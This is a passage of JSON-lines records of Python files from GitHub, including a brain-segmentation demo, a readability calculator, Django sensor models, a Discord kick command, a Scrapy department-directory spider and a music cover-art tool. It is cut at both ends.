############\")\n\n print('Brain Demo in Progress ... ')\n image = load_image(image_add,args.batch_size,False)\n labels = load_image(label_add, args.batch_size,True)\n init_seg = np.load(init_seg_add)\n labels[labels != 0] = 1\n seg_out_acm, seg_out = sess.run([phi_out, y_out_dl],{x: image, y: labels, out_seg: init_seg, phase: False})\n seg_out = seg_out[0, :, :, 0]\n seg_out_acm = seg_out_acm[0, :, :]\n gt_mask = labels[0, :, :, 0]\n f1 = f1_score(gt_mask, seg_out, labels=None, average='micro', sample_weight=None)\n print('CNN Dice {0:0.4f}'.format(f1))\n f2 = f1_score(gt_mask, seg_out_acm, labels=None, average='micro', sample_weight=None)\n print('ACM Dice {0:0.4f}'.format(f2))\n fig = plt.figure()\n plt.subplot(1, 3, 1)\n plt.title('DALS Output, Dice:{0:0.4f}'.format(f2))\n seg_out_acm=contoured_image(seg_out_acm, image[0,:,:,0])\n plt.imshow(seg_out_acm)\n plt.subplot(1, 3, 2)\n plt.title('CNN Output, Dice:{0:0.4f}'.format(f1))\n seg_out = contoured_image(seg_out, image[0, :, :, 0])\n plt.imshow(seg_out)\n plt.subplot(1, 3, 3)\n plt.title('Radiologist Annotation')\n gt_mask = contoured_image(gt_mask, image[0, :, :, 0])\n plt.imshow(gt_mask)\n plt.show()\n\n\n\n\n","repo_name":"ahatamiz/dals","sub_path":"main_demo.py","file_name":"main_demo.py","file_ext":"py","file_size_in_byte":13809,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"37"} +{"seq_id":"70748922029","text":"import string\nimport datetime\nimport matplotlib.pyplot as plt\n\nnumLines = 0\nnumWords = 0\nnumSentences = 0\n\nnumVowels = 0\nvowels = 'aeiouy'\nlistNumSyllables = []\nwordList = []\n\nfilename = '/Users/dave/CIS/678/P1/mb.txt'\n\nwith open(filename, 'r') as file:\n start_time = datetime.datetime.now()\n for line in file:\n line.replace(\"...\", \" \")\n numSentences += line.count('.')\n line = line.translate(None, string.punctuation)\n\n for word in line.split():\n silent = None\n num_syllables = 0\n\n if word.endswith('e'):\n silent = True\n\n for index, letter in enumerate(word):\n if index == 0 and word[index] in vowels:\n num_syllables += 1\n elif word[index - 1] not in vowels:\n if index < len(word) - 1 and word[index] in vowels:\n num_syllables += 1\n elif index == len(word) - 1 and word[index] in vowels:\n num_syllables += 1\n\n if num_syllables > 1 and silent:\n num_syllables -= 1\n\n listNumSyllables.append(num_syllables)\n\n total_time = datetime.datetime.now() - start_time\n milli = int(total_time.total_seconds() * 1000)\n\ntotalSyllables = sum(listNumSyllables)\ntotalWords = len(listNumSyllables)\n\naws = totalWords / float(numSentences)\nasl = totalSyllables / float(totalWords)\n\nfi = 206.835 - (1.015 * aws) - (84.6 * asl)\n\n# print('\\nAll Items for Histogram in: listNumSyllables')\n# print('Number of Sentences: %i' % numSentences)\n# print('Number of Words: %i' % len(listNumSyllables))\n# print('Number of Syllables: %i' % (sum(listNumSyllables)))\n# print('Average Number of Syllables Per Word %.2f' % asl)\n\nplt.hist(listNumSyllables)\nplt.title(\"Syllable Complexity - Moby Dick\")\nplt.xlabel(\"Number of Syllables\")\nplt.ylabel(\"Frequency\")\nplt.savefig('syllableFreq.png')\n\nprint('\\nFlesch Index: %.2f' % fi)\nprint('Execution Time: %i Milliseconds' % milli)\n\n\n","repo_name":"daverynties/Flesch-Index-Calculation","sub_path":"exploratoryAnalysis.py","file_name":"exploratoryAnalysis.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6135032778","text":"import string\r\n\r\nwith open('aoc_input3.1.txt') as file:\r\n ruck = [line.rstrip() for line in file]\r\n\r\n# Part 1\r\n\r\nlower_alphabet = list(string.ascii_lowercase)\r\nupper_alphabet = list(string.ascii_uppercase)\r\n\r\nalphabet = lower_alphabet + upper_alphabet\r\n\r\nalphabet_dict = {}\r\npriority = 1\r\nfor i in alphabet:\r\n alphabet_dict[i] = priority\r\n priority += 1\r\n\r\npriority_score = 0\r\n\r\nfor r in ruck:\r\n item_len = int(len(r)/2)\r\n r1 = set(r[0:item_len])\r\n r2 = set(r[item_len:])\r\n common_item = r1.intersection(r2)\r\n (element,) = common_item\r\n priority_score += alphabet_dict[element]\r\n\r\nprint(priority_score)\r\n\r\n# Part 2\r\n\r\nruck_group = []\r\nidx = 1\r\ntotal_len = int(len(ruck)/3)\r\ntemp_ruck = []\r\nfor r in ruck:\r\n temp_ruck.append(r)\r\n if idx % 3 == 0:\r\n ruck_group.append(temp_ruck)\r\n temp_ruck = []\r\n idx = 1\r\n else:\r\n idx += 1\r\n\r\nbadge_priority_score = 0\r\n\r\nfor rg in ruck_group:\r\n rg1 = set(rg[0])\r\n rg2 = set(rg[1])\r\n rg3 = set(rg[2])\r\n badge = rg1.intersection(rg2)\r\n common_badge = badge.intersection(rg3)\r\n # print(common_badge)\r\n (element,) = common_badge\r\n badge_priority_score += alphabet_dict[element]\r\n\r\nprint(badge_priority_score)\r\n","repo_name":"andyphua114/advent_of_code_2022","sub_path":"day_03/aoc_day3.py","file_name":"aoc_day3.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13897146069","text":"import logging\nfrom math import fmod\n\nimport django\nfrom django.conf import settings\nfrom django.db import models\n\nfrom zconnect.models import ModelBase\nfrom zconnect.util import exceptions\nfrom zconnect.zc_timeseries.util.tsaggregations import (\n AGGREGATION_CHOICES, GRAPH_CHOICES, aggregation_implementations)\n\nlogger = logging.getLogger(__name__)\n\n\n# Sentinel that just indicates that the data should be aggregated into one\n# point. This prevents 2 queries being done\nAGGREGATE_TO_ONE_VALUE = object()\n\n\nclass SensorType(ModelBase):\n \"\"\"A type of sensor\n\n Attributes:\n aggregation_type (str): Default aggregation to perform for this sensor\n type - eg 'avg', 'sum'\n descriptive_name (str): Longer description of sensor\n graph_type (str): What kind of graph this should be shown as in the app\n (bar or graph)\n product (Product): which product this sensor is associated with\n sensor_name (str): name of sensor\n unit (str): Unit of measurement (eg, \"Watts\")\n \"\"\"\n\n # The canonical name for this sensor\n sensor_name = models.CharField(max_length=50, blank=True)\n\n # A human readable sensor name, could be displayed under graphs etc.\n descriptive_name = models.CharField(max_length=50, blank=True)\n unit = models.CharField(max_length=30)\n graph_type = models.CharField(max_length=20, choices=GRAPH_CHOICES, default=\"ts_graph\")\n aggregation_type = models.CharField(max_length=20, choices=AGGREGATION_CHOICES, default=\"sum\")\n # products can't be deleted until all devices are deleted as well. Once we\n # can delete it, all sensor types are a bit pointless to keep, so delete\n # them instead.\n product = models.ForeignKey(\"zconnect.Product\", models.CASCADE, related_name=\"sensors\", blank=False)\n\n class Meta:\n unique_together = [\"sensor_name\", \"product\"]\n\n\nclass DeviceSensor(ModelBase):\n \"\"\"A sensor associated with a device\n\n Attributes:\n device (Device): associated device\n resolution (float): how often this is sampled, in seconds\n sensor_type (SensorType): type of sensor\n \"\"\"\n\n resolution = models.FloatField(default=120.0)\n # If device goes, just delete this. device should never be deleted really\n # though\n device = models.ForeignKey(settings.ZCONNECT_DEVICE_MODEL, models.CASCADE, related_name=\"sensors\", blank=False)\n # Can't leave the sensor type null\n sensor_type = models.ForeignKey(SensorType, models.PROTECT, blank=False)\n\n class Meta:\n # NOTE\n # This seems to make sense but it would break in the case that a device\n # has multiple of the same sensor.\n unique_together = (\"device\", \"sensor_type\")\n\n def get_latest_ts_data(self):\n \"\"\"Get latest ts data on this sensor for this device\n\n The latest_ts_data_optimised on AbstractDevice should be used instead of\n directly calling this\n \"\"\"\n\n from .timeseriesdata import TimeSeriesData\n\n try:\n data = TimeSeriesData.objects.filter(\n sensor=self,\n ).latest(\"ts\")\n except TimeSeriesData.DoesNotExist:\n # If the device hasn't made any timeseries data yet.\n return {}\n\n return data\n\n def _get_aggregated_data(self, data_start, data_end, resolution, aggregation_type):\n \"\"\"Implementation of aggregating data. See other functions for meanings\n of arguments.\n\n Raises:\n TimeSeriesData.DoesNotExist: If there is no data in the given period\n \"\"\"\n from .timeseriesdata import TimeSeriesData\n\n # Multiple of resolution\n # We extract just the values_list here because doing it in a\n # separate statement results in django querying the database\n # twice...\n raw = TimeSeriesData.objects.filter(\n ts__gte=data_start,\n ts__lt=data_end,\n sensor=self,\n ).values_list(\"value\", \"ts\")\n\n if not raw:\n # This should raise above but for some reason it doesn't when using\n # values_list\n raise TimeSeriesData.DoesNotExist\n\n # How many samples we would expect if there was no missing data\n expected_samples = (data_end - data_start).total_seconds()/self.resolution\n\n if resolution is AGGREGATE_TO_ONE_VALUE:\n aggregation_factor = expected_samples\n else:\n # Already checked that this divides nicely\n # NOTE\n # should aggregation_factor ALWAYS be expected_samples?\n aggregation_factor = int(resolution//self.resolution)\n\n logger.debug(\"%s objects to aggregate\", len(raw))\n\n aggregation_engine = aggregation_implementations[settings.ZCONNECT_TS_AGGREGATION_ENGINE]\n\n logger.debug(\"Aggregating '%s' with %s, factor %s\",\n aggregation_type, settings.ZCONNECT_TS_AGGREGATION_ENGINE,\n aggregation_factor)\n\n data = aggregation_engine(\n raw,\n aggregation_type,\n aggregation_factor,\n expected_samples,\n data_start,\n data_end,\n self,\n )\n\n return data\n\n def optimised_data_fetch(self, data_start, data_end, resolution):\n \"\"\"Get data from given time block and possibly average it\n\n See Device.optimised_data_fetch for args\n\n This function assumes all the input data is already validated.\n \"\"\"\n\n if resolution < self.resolution or fmod(resolution, self.resolution):\n raise django.db.DataError(\"Resolution should be a multiple of {} (was {})\".format(\n self.resolution, resolution))\n\n from .timeseriesdata import TimeSeriesData\n\n # XXX\n # equals for floats? If resolution is not a whole number this won't work\n if resolution == self.resolution:\n # No aggregation, just get the data\n # It's already sorted by time in the database\n data = TimeSeriesData.objects.filter(\n sensor=self,\n ts__gte=data_start,\n ts__lt=data_end,\n )\n else:\n data = self._get_aggregated_data(\n data_start,\n data_end,\n resolution,\n self.sensor_type.aggregation_type,\n )\n\n return data\n\n def archive_between(self, data_start, data_end, *, aggregation_type=None, delete=False):\n \"\"\"Create a ts archive between the start and data_end dates\n\n This does it like ``[data_start, data_end)`` - including start, not end\n\n If delete is True, also delete the old ts data.\n\n Args:\n data_start (datetime): start of archive\n data_end (datetime): end of archives\n\n Keyword args:\n delete (bool, optional): delete old ts data if True\n aggregation_type (str, optional): If this is passed then it will use\n that aggregation type rather than the 'default' on the sensor\n type. This has to be one of\n zc_timeseries.util.tsaggregations.AGGREGATION_CHOICES or it will\n raise an error. Note that some of these choices may be\n meaningless for certain data types (eg, sum of temperatures over\n a month is a bit useless)\n\n Returns:\n TimeSeriesDataArchive: archive of data between data_start and data_end\n\n Raises:\n TimeSeriesData.DoesNotExist: If there is no data between data_start and\n data_end\n \"\"\"\n\n from .timeseriesdata import TimeSeriesData, TimeSeriesDataArchive\n\n if not aggregation_type:\n aggregation_type = self.sensor_type.aggregation_type\n elif aggregation_type not in (i[0] for i in AGGREGATION_CHOICES):\n raise exceptions.IncorrectAggregationError(\"'{}' is not a valid aggregation\".format(aggregation_type))\n\n data = self._get_aggregated_data(\n data_start,\n data_end,\n AGGREGATE_TO_ONE_VALUE,\n aggregation_type,\n )\n\n logger.debug(\"to archive: %s\", data)\n\n archived = TimeSeriesDataArchive(\n start=data_start,\n end=data_end,\n value=data[0].value,\n sensor=self,\n aggregation_type=aggregation_type,\n )\n archived.save()\n\n logger.debug(\"archived %s to %s with %s: %s\", archived.start, archived.end, self.sensor_type.aggregation_type, archived.value)\n\n if delete:\n TimeSeriesData.objects.filter(\n sensor=self,\n ts__gte=data_start,\n ts__lt=data_end,\n ).delete()\n\n return archived\n","repo_name":"zconnect-iot/zconnect-django","sub_path":"zconnect/zc_timeseries/_models/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":8729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42990155114","text":"class Node:\n def __init__(self,val):\n self.val=val\n self.next=None\n\n\nclass linkedList:\n def __init__(self):\n self.head=None\n\n def printNode(self):\n while self.head!=None:\n print(self.head.val)\n self.head=self.head.next\n def insertHead(self,node):\n node.next=self.head\n self.head=node\n def insertAtIndex(self,i,node):\n if i==0:\n self.insertHead(node)\n else:\n cur=self.head\n for k in range(0,i-1):\n cur=cur.next\n if cur==None: return\n node.next=cur.next\n cur.next=node\n\n def deleteHead(self,):\n if self.head==None: return\n self.head=self.head.next\n\n def deleteAtIndex(self,i):\n if i==0:\n self.deleteHead()\n else:\n cur=self.head\n for i in range(0,i-1):\n cur=cur.next\n if cur==None: return\n if cur.next==None: return\n cur.next=cur.next.next\n\ndef nodeTest():\n myList=linkedList()\n myList.insertHead(Node(1))\n myList.insertAtIndex(1,Node(2))\n #myList.deleteHead()\n myList.deleteAtIndex(1)\n myList.printNode()\n\nif __name__ == '__main__':\n nodeTest()","repo_name":"jzhengcse/data_structures","sub_path":"LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38123697634","text":"import exifread\nimport datetime\nimport base64\n\ndef parse_timestamp(metadata, date, subsec):\n try:\n value = '{}.{}'.format(metadata[date], metadata.get(subsec, 0))\n return datetime.datetime.strptime(value, '%Y:%m:%d %H:%M:%S.%f')\n except (ValueError, KeyError):\n return None\n\ndef parse(path):\n with open(path, 'rb') as fd:\n raw = {}\n for key, value in exifread.process_file(fd).items():\n if type(value) == bytes:\n raw[key] = base64.b64encode(value).decode('utf-8')\n else:\n raw[key] = str(value)\n\n time = (\n parse_timestamp(raw, 'EXIF DateTimeOriginal', 'EXIF SubSecTimeOriginal') or\n parse_timestamp(raw, 'EXIF DateTime', 'EXIF SubSecTime')\n )\n\n raw = {'exifread': raw}\n\n return raw, {'taken_at': time}\n","repo_name":"mfichman/media-organizer","sub_path":"metadata/exif.py","file_name":"exif.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10016248168","text":"#-*- coding:utf-8 -*-\n#将语料进行处理,添加上一列非句首词的大写首字母作为新的特征\n\nfile = open(\"ngLoc.testb\")\nfile2 = open(\"engLocBighead.testb\",\"w\")\nline_num = 0\nisHead = False\n\nfor line in file:\n string = \"\"\n line_num +=1\n wlist = line.split()\n if line_num == 1 or len(wlist) == 0:\n isHead = True\n if len(wlist) == 0:\n string += \"\\n\"\n file2.write(string)\n continue\n\n words = list(wlist[0])\n if words[0].isupper() and isHead==False:\n wlist[2] = words[0]\n else:\n wlist[2] = \"o\"\n if len(wlist) != 0:\n isHead = False\n for s in wlist:\n string += s+\" \"\n string += \"\\n\"\n file2.write(string)\n\nfile2.close()","repo_name":"antdlx/NLTKTest","sub_path":"BigHead.py","file_name":"BigHead.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31280025667","text":"import discord\nfrom discord.ext import commands\nfrom logs import Logs\nimport re\nfrom Data.database_handler import DataBaseHandler\nfrom get_language import get_language\n\ndatabase_handler = DataBaseHandler(\"database.db\")\n\nmember_re = re.compile(r\"[\\D]\")\n\ndef setup(bot):\n bot.add_cog(Kick(bot))\n\nclass Kick(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n \n \n @commands.command()\n @commands.has_permissions(kick_members = True)\n async def kick(self, ctx, user, *, reason = \"Aucune raison\"):\n langue = get_language(ctx)\n user = await self.is_discord_member(user, ctx.guild)\n if not user.bot:\n if user == ctx.author:\n return await ctx.send(langue.kickme)\n\n if not reason:\n reason = langue.reason\n \n if ctx.author.top_role > user.top_role or ctx.author.id == ctx.guild.owner.id:\n try:\n embed = discord.Embed(title = langue.kicktitle, description = langue.kickdescription, color=0xff8000)\n embed.set_author(name = ctx.author, icon_url = ctx.author.avatar_url)\n embed.set_thumbnail(url = \"https://discordemoji.com/assets/emoji/BanneHammer.png\")\n embed.add_field(name = langue.kickuser, value = user.mention, inline = True)\n embed.add_field(name = langue.reason, value = reason, inline = True)\n embed.add_field(name = langue.moderator, value = ctx.author.mention, inline = True)\n await ctx.guild.kick(user, reason = reason)\n await ctx.send(embed = embed)\n return await Logs.logsKick(self, ctx, user, reason)\n except:\n return await ctx.send(langue.errorbotdoesnthavepermissions)\n \n if ctx.author.top_role < user.top_role:\n return await ctx.send(langue.kicktoprole)\n \n if ctx.author.top_role == user.top_role:\n return await ctx.send(langue.kickequalrole)\n else:\n return await ctx.send(langue.kickbot)\n\n \n async def is_discord_member(self, member: str, guild):\n try:\n return guild.get_member(int(member_re.sub(\"\" ,member)))\n except Exception as e:\n return\n","repo_name":"RomainMURIER/discordpy_admin_cmds","sub_path":"kick.py","file_name":"kick.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28856545417","text":"import numpy as np\n\nfrom MyML.CalcGraph.AbstractGraph import CalcGraph\nfrom MyML.DataPipelineTools.DataLoader import DataLoader\nfrom MyML.Helpers.NpExtensions.AxisHelpers import add_axis_if_1d\nfrom MyML.Losses.AbstractLoss import AbstractLoss\nfrom MyML.Optimizers.Optimizer import Optimizer\n\n\nclass BatchGradientOptimizer(Optimizer):\n def __init__(\n self, learning_rate: float, max_batch_size: int, norm_grad: bool = False\n ):\n self.__learning_rate__ = learning_rate\n self.__max_batch_size__ = max_batch_size\n self.__norm_grad__ = norm_grad\n\n def update_node_parameters(\n self, graph_node: CalcGraph, loss: AbstractLoss, data: DataLoader\n ) -> None:\n parameters_to_update = graph_node.get_learnable_parameters()\n data_to_calc_grads, labels = map(\n add_axis_if_1d, data.get_data_batch(self.__max_batch_size__)\n )\n\n grad = np.apply_along_axis(graph_node.calc_grads, -1, data_to_calc_grads)\n grad = add_axis_if_1d(grad)\n if self.__norm_grad__:\n grad /= np.linalg.norm(grad)\n predicted_values = add_axis_if_1d(\n np.squeeze(\n np.apply_along_axis(graph_node.calc_forward, -1, data_to_calc_grads)\n )\n )\n loss_grads = np.apply_along_axis(\n loss.calc_grads, -1, np.dstack((predicted_values, labels))\n )\n grad_shape = grad.shape\n grad = (grad.reshape((grad_shape[0], -1)) * loss_grads).reshape(grad_shape)\n grad = grad.mean(axis=0)\n parameters_to_update -= self.__learning_rate__ * grad\n","repo_name":"kokamido/TryToMakeSmthng","sub_path":"MyML/Optimizers/BatchGradientOptimizer.py","file_name":"BatchGradientOptimizer.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42566117036","text":"pageLog = open(\"actions.log\", \"r\")\nparsedPageLog = open(\"octavePagesBusiness.m\", \"w\", encoding=\"utf-8\")\n\niPages = 20\n\ntimeOctave = [0]\n\npagesRead = []\npagesWrite = []\npagesFree = [i for i in range(iPages)]\n\npagesReadOctave = [0]\npagesWriteOctave = [0]\npagesFreeOctave = [iPages]\n\nminTime = -1\n\nlAll = []\n\nfor line in pageLog:\n\tstate = \"\"\n\tif(\"reading page #\" in line):\n\t\tstate = \"reading\"\n\telif(\"writing page number to page #\" in line):\n\t\tstate = \"pwriting\"\n\t#elif(\"release reader's semaphore #\" in line or\n\t#\t\t\"read the page #\" in line):\n\telif(\"release reader's semaphore #\" in line):\n\t\tstate = \"PWfree\"\n\telif(\"read the page #\" in line):\n\t\tstate = \"Rfree\"\n\tif(state != \"\"):\n\t\tline = line.replace(\"\\n\", \"\")\n\t\ttime = int(line[:line.find(\" \")])\n\t\tif(minTime == -1):\n\t\t\tminTime = time\n\t\ttime = time - minTime\n\t\tline = line[line.find(\"#\")+1:]\n\t\tif(line.find(\".\") >= 0):\n\t\t\tpageNumber = int(line[:line.find(\".\")])\n\t\telse:\n\t\t\tpageNumber = int(line)\n\t\t\n\t\tif(state == \"reading\"):\n\t\t\tif(pageNumber in pagesWrite):\n\t\t\t\tpagesWrite.remove(pageNumber)\n\t\t\tif(pageNumber in pagesFree):\n\t\t\t\tpagesFree.remove(pageNumber)\n\t\t\tpagesRead.append(pageNumber)\n\t\telif(state == \"pwriting\"):\n\t\t\tif(pageNumber in pagesRead):\n\t\t\t\tpagesRead.remove(pageNumber)\n\t\t\tif(pageNumber in pagesFree):\n\t\t\t\tpagesFree.remove(pageNumber)\n\t\t\tpagesWrite.append(pageNumber)\n\t\telse:\n\t\t\tif(pageNumber in pagesWrite):\n\t\t\t\tpagesWrite.remove(pageNumber)\n\t\t\tif(pageNumber in pagesRead):\n\t\t\t\tpagesRead.remove(pageNumber)\n\t\t\tif(pageNumber not in pagesFree):\n\t\t\t\tpagesFree.append(pageNumber)\n\t\t\n\t\ttimeOctave.append(time)\n\t\tpagesReadOctave.append(len(pagesRead))\n\t\tpagesWriteOctave.append(len(pagesWrite))\n\t\tpagesFreeOctave.append(len(pagesFree))\n\t\t\n\t\tlAll.append([state[0], time, pageNumber])\n\t\t\n_pWrite = []\n_pRead = []\n_pFree = [i for i in range(iPages)]\n\n_time = [0]\n_poWrite = [0]\n_poRead = [0]\n_poFree = [iPages]\n\t\t\n#print(lAll)\n#lAll.sort()\t\t# Интнресный результат ждет того, кто разкомментирует\nlAll = sorted(lAll, key = lambda x: (x[1], x[0]))\n#print(\"\\nNEW\\n\", lAll)\n\noutLog = open(\"bLog.log\", \"w\")\n\nfor info in lAll:\n\tstate = info[0]\n\ttime = info[1]\n\tpageNumber = info[2]\n\tif(\"r\" == state):\n\t\tif(pageNumber in _pWrite):\n\t\t\t_pWrite.remove(pageNumber)\n\t\tif(pageNumber in _pFree):\n\t\t\t_pFree.remove(pageNumber)\n\t\t_pRead.append(pageNumber)\n\telif(\"p\" == state):\n\t\tif(pageNumber in _pRead):\n\t\t\t_pRead.remove(pageNumber)\n\t\tif(pageNumber in _pFree):\n\t\t\t_pFree.remove(pageNumber)\n\t\t_pWrite.append(pageNumber)\n\telse:\n\t\tif(pageNumber in _pWrite):\n\t\t\t_pWrite.remove(pageNumber)\n\t\tif(pageNumber in _pRead):\n\t\t\t_pRead.remove(pageNumber)\n\t\tif(pageNumber not in _pFree):\n\t\t\t_pFree.append(pageNumber)\n\t\t\t\n\t_time.append(time)\n\t_poRead.append(len(_pRead))\n\t_poWrite.append(len(_pWrite))\n\t_poFree.append(len(_pFree))\n\toutLog.write(f\"{time} | page #{pageNumber}, state = {state}\\n\")\n\t\noutLog.close()\n\n#parsedPageLog.write(f\"time = {timeOctave};\\nread = {pagesReadOctave};\\nwrite = {pagesWriteOctave};\\nfree = {pagesFreeOctave};\\n\")\nparsedPageLog.write(f\"time = {_time};\\nread = {_poRead};\\nwrite = {_poWrite};\\nfree = {_poFree};\\n\")\nparsedPageLog.write(\"figure;\\nhold on;\\nplot(time, read, \\\"r\\\");\\nplot(time, write, \\\"b\\\");\\nplot(time, free, \\\"g\\\");\\nxlabel(\\\"Время, мс\\\")\\nhold off;\")\npageLog.close()\nparsedPageLog.close()","repo_name":"Leha009/OS","sub_path":"4/1/_PagesStatesFromFolders.py","file_name":"_PagesStatesFromFolders.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36765121272","text":"# -----------------------------------------------------------\r\n# Your Job\r\n# Find the sum of all multiples of n below m\r\n# \r\n# Keep in Mind\r\n# n and m are natural numbers (positive integers)\r\n# m is excluded from the multiples\r\n# \r\n# Examples\r\n# sumMul(2, 9) ==> 2 + 4 + 6 + 8 = 20\r\n# sumMul(3, 13) ==> 3 + 6 + 9 + 12 = 30\r\n# sumMul(4, 123) ==> 4 + 8 + 12 + ... = 1860\r\n# sumMul(4, -7) ==> \"INVALID\"\r\n# -----------------------------------------------------------\r\n\r\n\r\ndef sum_mul(n, m):\r\n if n <= 0 or m <= 0:\r\n return \"INVALID\"\r\n mult = 0\r\n for i in range(n, m):\r\n if i % n == 0:\r\n mult += i\r\n return mult\r\n\r\n# or\r\n\r\ndef sum_mul(n, m):\r\n if n <= 0 or m <= 0:\r\n return \"INVALID\"\r\n else:\r\n return sum(range(n, m, n))\r\n\r\n# -----------------------------------------------------------\r\n# License\r\n# Tasks are the property of Codewars (https://www.codewars.com/) \r\n# and users of this resource.\r\n# \r\n# All solution code in this repository \r\n# is the personal property of Vladimir Rukavishnikov\r\n# (vladimirrukavishnikovmail@gmail.com).\r\n# \r\n# Copyright (C) 2022 Vladimir Rukavishnikov\r\n# \r\n# This file is part of the HungryVovka/Codewars-Python\r\n# (https://github.com/HungryVovka/Codewars-Python)\r\n# \r\n# License is GNU General Public License v3.0\r\n# (https://github.com/HungryVovka/Codewars-Python/blob/main/LICENSE.md)\r\n# \r\n# You should have received a copy of the GNU General Public License v3.0\r\n# along with this code. If not, see http://www.gnu.org/licenses/\r\n# -----------------------------------------------------------","repo_name":"HungryVovka/Codewars-Python","sub_path":"8 kyu/Sum of Multiples.py","file_name":"Sum of Multiples.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32122044018","text":"import scrapy\n\n\nclass DepartmentSpider(scrapy.Spider):\n name = 'department'\n allowed_domains = ['directory.fit.edu']\n start_urls = ['https://directory.fit.edu/department']\n\n departmentAttributes = [\n {\n 'header': 'Phone',\n 'xpath': 'a/text()',\n 'key': 'phone'\n }, {\n 'header': 'Fax',\n 'xpath': 'text()',\n 'key': 'fax'\n }, {\n 'header': 'Email',\n 'xpath': 'a/text()',\n 'key': 'email'\n }, {\n 'header': 'Website',\n 'xpath': 'a/text()',\n 'key': 'website'\n }, {\n 'header': 'Primary Location',\n 'xpath': 'text()',\n 'key': 'primaryLocation'\n }\n ]\n\n def parse(self, response: scrapy.http.TextResponse):\n departmentUrls = response.xpath('''\n //div[@class=\"twelve wide column\"]\n /div[@class=\"ui list\"]\n /a[@class=\"item\"]\n /@href\n ''').getall()\n # print(departmentUrls)\n\n yield from response.follow_all(departmentUrls, callback=self.parseDepartment)\n\n def parseDepartment(self, response: scrapy.http.TextResponse):\n # print(response.url)\n\n # It's not guaranteed all fields are present on the page\n headers = response.xpath('''\n //div[@class=\"twelve wide column\"]\n /table[@class=\"ui celled table\" and position()=1]\n //th\n /text()\n ''').getall()\n # print(headers)\n\n tdTags = response.xpath('''\n //div[@class=\"twelve wide column\"]\n /table[@class=\"ui celled table\" and position()=1]\n //td\n ''')\n # print(data)\n\n name: str = response.xpath('''\n //div[@class=\"twelve wide column\"]\n /h2\n /text()\n ''').get()\n\n department = {\n 'name': name,\n 'code': response.url[len('https://directory.fit.edu/department/'):]\n }\n\n for attribute in self.departmentAttributes:\n header: str = attribute['header']\n xpath: str = attribute['xpath']\n key: str = attribute['key']\n\n # If we don't see the header, set field to default value\n if header not in headers:\n department[key] = None\n continue\n\n # Otherwise extract the string\n index = headers.index(header)\n value = tdTags[index].xpath(xpath).get()\n department[key] = value\n\n # print(department)\n yield department\n","repo_name":"XuZhen86/FloridaTechDataSpider","sub_path":"FloridaTechDataSpider/spiders/department_spider.py","file_name":"department_spider.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15418854926","text":"from django.conf.urls import patterns, include, url, handler404, handler500\nfrom ecomstore import settings\nimport os\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nhandler404 = handler404\nhandler500 = handler500\n\nurlpatterns = patterns('',\n url(r'^catalog/$', 'preview.views.home'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^', include('catalog.urls')),\n url(r'^cart/', include('cart.urls')),\n)\n\ndef rel(*x):\n return os.path.join(os.path.abspath(os.path.dirname(__file__).decode('utf-8')).replace('\\\\', '/'), *x)\n\nif not settings.DEBUG:\n urlpatterns += patterns('',\n (r'^static/(?P.*)$', 'django.views.static.serve',\n { 'document_root' : rel('static') }),\n )","repo_name":"ravitejab45/sample-code","sub_path":"ecomstore/ecomstore/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5538592526","text":"# 列出文件及元数据\nimport mutagen\nimport os\nfrom mutagen import File\nfrom mutagen.id3 import ID3, APIC, error\n\n\n# Mutagen检查当前文件是否包含图片,没有图片->True\ndef no_cover_art(file_path):\n audio = mutagen.File(file_path)\n if hasattr(audio, \"pictures\"):\n return len(audio.pictures) == 0\n return True\n\n\ndef search_music(path):\n extensions = ['.mp3', '.wav', '.flac']\n # 初始化音乐列表\n musics_without_cover = []\n\n # 递归遍历:拓展名为上述,且元数据不包含图片\n def traverse_directory(directory):\n for root, dirs, files in os.walk(directory):\n for file in files:\n file_path = os.path.join(root, file)\n if file.endswith(tuple(extensions)) & no_cover_art(file_path):\n audio = mutagen.File(file_path)\n musics_without_cover.append({\n \"path\": file_path,\n \"artist\": audio[\"artist\"],\n \"title\": audio[\"title\"],\n \"album\": audio[\"album\"]\n })\n\n # 递归子目录\n for subdir in dirs:\n subdir_path = os.path.join(root, subdir)\n traverse_directory(subdir_path)\n\n traverse_directory(path)\n return musics_without_cover\n\n\ndef insert(path, image):\n # 这里的image是图片对象,从网络下载\n audio = ID3(path)\n apic = APIC(encoding=3, mime='image/jpeg', type=3, desc=u'Front Cover', 